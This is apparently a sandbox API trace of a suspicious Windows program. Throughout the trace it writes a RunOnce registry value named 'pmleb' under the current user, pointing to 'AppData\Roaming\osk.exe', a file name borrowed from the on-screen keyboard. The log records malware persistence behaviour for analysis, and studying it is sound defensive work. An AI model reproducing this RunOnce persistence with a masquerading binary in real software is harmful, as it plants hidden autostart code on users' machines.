lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.022] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.023] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.023] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.023] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.023] RegCloseKey (hKey=0x280) returned 0x0 [0080.023] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.023] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.023] SetTimer (hWnd=0x20280, nIDEvent=0x2060, uElapse=0xa, lpTimerFunc=0x0) returned 0x2060 [0080.023] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.033] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.034] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.034] KillTimer (hWnd=0x20280, uIDEvent=0x2060) returned 1 [0080.034] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.034] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.034] IUnknown:Release (This=0x787518) returned 0x1 [0080.034] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.035] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.035] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.035] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.035] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.035] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.035] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.035] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.035] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.035] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x61 [0080.035] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.035] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x62 [0080.035] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.036] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x61 [0080.036] ??2@YAPAXI@Z () returned 0x2b524a0 [0080.036] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.037] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.037] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.037] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.037] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.037] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.037] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.037] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.037] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.038] RegCloseKey (hKey=0x280) returned 0x0 [0080.038] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.038] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.038] SetTimer (hWnd=0x20280, nIDEvent=0x2061, uElapse=0xa, lpTimerFunc=0x0) returned 0x2061 [0080.038] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.049] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.049] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.050] KillTimer (hWnd=0x20280, uIDEvent=0x2061) returned 1 [0080.050] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.050] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.050] IUnknown:Release (This=0x787518) returned 0x1 [0080.050] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.050] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.050] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.051] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.051] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.051] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.051] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.051] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.051] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.051] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x62 [0080.051] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.051] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x63 [0080.051] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.052] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x62 [0080.052] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.052] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.052] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.052] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.052] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.052] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.052] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.053] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.053] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.053] RegCloseKey (hKey=0x280) returned 0x0 [0080.053] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.053] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.053] SetTimer (hWnd=0x20280, nIDEvent=0x2062, uElapse=0xa, lpTimerFunc=0x0) returned 0x2062 [0080.053] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.065] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.065] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.065] KillTimer (hWnd=0x20280, uIDEvent=0x2062) returned 1 [0080.065] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.065] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.065] IUnknown:Release (This=0x787518) returned 0x1 [0080.065] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.065] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.065] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.066] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.066] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.066] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.066] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.066] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.066] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.066] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x63 [0080.066] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.066] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x64 [0080.066] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.067] 